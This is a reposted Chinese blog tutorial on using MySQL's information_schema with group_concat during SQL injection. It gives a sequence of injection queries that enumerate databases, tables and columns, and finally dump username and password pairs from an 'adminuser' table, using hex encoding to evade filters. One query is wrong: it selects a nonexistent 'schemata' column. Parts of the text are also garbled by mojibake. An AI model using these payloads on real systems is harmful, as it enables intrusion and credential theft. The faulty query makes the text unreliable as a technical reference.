ITdaan
首页
最新
原创
最火
收藏夹
写博客
关于
搜索答案
搜索本文相关内容
mysql 5注入中group_concat的使用
本文转载自
北北_
查看原文
2009/08/24
10
注入
/
group_concat
/
mysql
/
休闲
/
数据库
/
sql
收藏
0
0
mysql中的information_schema 结构用来存储数据库系统信息
information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表。
| SCHEMATA �D�D>存储数据库名的,
|――>关键字段:SCHEMA_NAME,表示数据库名称
| TABLES �D�D>存储表名的
|――>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示表的名称
| COLUMNS �D�D>存储字段名的
|――>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示所属的表的名称
COLUMN_NAME表示字段名
可以看到,我们只要通过注射点构造查询语句遍相关字段,就可以得到我们想要的信息了。
爆所有数据名
select group_concat(schemata) from information_schema.schemata
得到当前库的所有表
select group_concat(table_name) from information_schema.tables where table_schema=database()
得到表中的字段名 将敏感的表进行16进制编码adminuser=0x61646D696E75736572
select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572
得到字段具体的值
select group_concat(username,0x3a,password) from adminuser
智能推荐
×
注意!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系我们删除。
猜您在找
Mysql中group_concat的使用
mysql中GROUP_CONCAT的使用
MySql中group_concat()函数的使用
MySQL中group_concat()函数的使用
mysql中函数DISTINCT,group by,CONCAT及GROUP_CONCAT的使用
【No280】2018年使用MyCAT+MySQL搭建高可用数据库集群大型实践课程教程
【No281】2018年最新JAVA开发中的热点技术深入剖析 视频教程
【No478】超亮主讲Windows系统安全基础(已更新至第六章,待更新中......)介意的不要拍哦
赞助商链接
© 2014-2019 ITdaan.com
粤ICP备14056181号
×
收藏本文
添加到收藏夹 *
赞助商广告